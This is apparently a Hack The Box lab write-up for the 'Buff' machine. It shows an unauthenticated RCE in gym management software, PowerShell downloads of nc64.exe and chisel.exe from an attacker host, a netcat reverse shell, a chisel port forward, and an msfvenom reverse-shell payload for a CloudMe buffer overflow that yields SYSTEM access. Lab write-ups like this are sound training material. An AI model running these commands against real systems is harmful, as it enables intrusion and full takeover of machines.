HTB Writeup - Buff
Hints
- There is something in this box which may not spin up as intended reliably. You’ll be able to get an initial foothold without this thing, but if you get stuck trying to find a path forward, it’s possible the thing you want hasn’t actually started and you’ll need to restart the machine.
- This is a tedious box containing a type of exploit that may break the attack path. If you are certain an exploit should have worked and you have checked everything else, restart the machine. It is likely it just failed, potentially broke further exploit attempts and needs to be rebooted.
Enumeration
As usual we start off with an nmap scan:
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: mrb3ns Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
We only have 2 ports open and they aren't the usual suspects for a web server, but it looks like a Windows machine running Apache and PHP.
Exploitation
Browsing the web site reveals the site is made with gym management software v1.0, which has a well-published exploit, https://www.exploit-db.com/exploits/48506. This is an unauthenticated remote code execution that abuses the ability to upload arbitrary PHP files to the /upload.php endpoint without authentication.
Execution of this leads us to gaining a pseudo-shell as the shaun user:
python3 exploit.py http://$target:8080/
Escalation from shaun
Running systeminfo allows us to see we are running on a 64-bit Windows host, so we can create a better shell using nc64.exe.
We can transfer it onto the host by standing up a web server with:
python3 -m http.server 9091
And downloading it on the host:
powershell -c "Invoke-WebRequest http://10.10.14.3:9091/nc64.exe -outfile nc64.exe"
We trigger a shell using:
C:\xampp\htdocs\gym\upload\nc64.exe -e cmd.exe 10.10.14.3 4444
We catch this shell back on our attack host using rlwrap and nc:
rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.25.107] 49676
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>
One of the first things to do on any box is to determine who we are and what our privileges are, but the shaun user has nothing of significance. The second thing we do is look for other running services that could be exploitable. Running netstat -ano shows something listening on localhost only, on port 8888:
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 8816
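As an added illustration (not part of the original writeup), the same netstat -ano step done in PowerShell: it maps each listening TCP socket to its owning process and executable path, and flags loopback-only listeners, which an external scan like the one above cannot see. It assumes a Windows host with the NetTCPIP module (Get-NetTCPConnection), which stock Windows 10 has:

```powershell
# Added example, not code from the writeup: list listening TCP sockets with the
# owning process, the way "netstat -ano" plus a PID lookup does by hand.
Get-NetTCPConnection -State Listen |
    Sort-Object LocalPort |
    ForEach-Object {
        # The process may have exited or be unreadable with our rights; tolerate that.
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [PSCustomObject]@{
            LocalAddress = $_.LocalAddress
            LocalPort    = $_.LocalPort
            PID          = $_.OwningProcess
            Process      = if ($proc) { $proc.ProcessName } else { '?' }
            # .Path is only populated for processes we are allowed to inspect
            Path         = if ($proc -and $proc.Path) { $proc.Path } else { '?' }
            # Bound to loopback only: reachable from the host itself, not from the network
            LoopbackOnly = ($_.LocalAddress -in @('127.0.0.1', '::1'))
        }
    } | Format-Table -AutoSize
```

On this box the row for port 8888 would show LoopbackOnly as True and the path of the CloudMe executable, which is the same conclusion the writeup reaches from the PID.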
We cannot interact with this service from our attack host directly. We need to somehow get access to port 8888. With Linux and SSH access, this would be done with a port forward rather simply. On Windows, we need to put our own proxy tooling in place to gain access to it. We will use chisel.exe for this. We load it onto the host in the same way we loaded nc64.exe.
powershell -c "Invoke-WebRequest http://10.10.14.3:9091/chisel.exe -outfile chisel.exe"
On our attack host, we can prepare our chisel server to listen on port 8002:
chisel server --reverse --port 8002
Keep in mind, if you have a firewall on your attack host, all these listening ports will need to be opened. I use ufw, so I run sudo ufw allow 8002 to enable traffic in via this port. I close it when I'm done. I use kali, which is decently secure by default, but if you are running quite a few services, you may end up leaking open ports over time and services you don't need to run. Always remember to clean up and lock the doors when you're done.
On the target, I can now run the chisel client to open up the local 8888 port:
C:\xampp\htdocs\gym\upload\chisel.exe client 10.10.14.3:8002 R:8888:127.0.0.1:8888
If you now run nmap again targeting 127.0.0.1 instead, you should see an open port on 8888 that leads to the target's equivalent port:
sudo nmap -sT -v -p8888 -Pn 127.0.0.1
PORT STATE SERVICE
8888/tcp open sun-answerbook
It's not a web service, because going to it in the browser and trying HTTP against it will fail. But looking around the box for executables, and checking what the PID of the listening process is, we can see that it is a CloudMe application. Running a searchsploit search reveals that many versions of CloudMe are vulnerable to buffer overflows. The top listed exploit has a similar version to the filename on the host: Cloudme_1112.exe.
We can copy this exploit to our local directory with searchsploit -m 48389 and mv 48389.py cloudme_bof.py. It is a really simple buffer overflow and all we need to do is generate a valid payload for it.
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 EXITFUNC=thread -b '\x00\x0A\x0D' -f python -v payload
Note that I use mostly the same arguments as the ones suggested in the exploit, but have also added EXITFUNC=thread. I think this is important to better protect from crashing the box or the process if for whatever reason it fails. Buffer overflows can often cause crashes, and if the process is running as NT AUTHORITY\SYSTEM, you are not going to be able to restart that service and have another go, unless you reboot the whole machine. Initially, my thought was to use a command exploit and perform a net localgroup Administrators shaun /add command, but I don't really like doing these kinds of exploits for 2 reasons: in HTB, with shared machines, you might be disrupting the experience for other players because they'll arrive on the machine as the root user and not understand why, and secondly, in a real penetration test, it's always best to avoid modifying the working environment as much as possible for real users. I.e. get a root shell, then create persistence using a custom user, rather than upping the privileges of a real user, which may have unintended side effects in the environment.
The shellcode generated from msfvenom can then be applied to the PoC above. We can now run the python3 cloudme_bof.py script and catch the shell in a nc listener on our attack host as the NT AUTHORITY\SYSTEM user.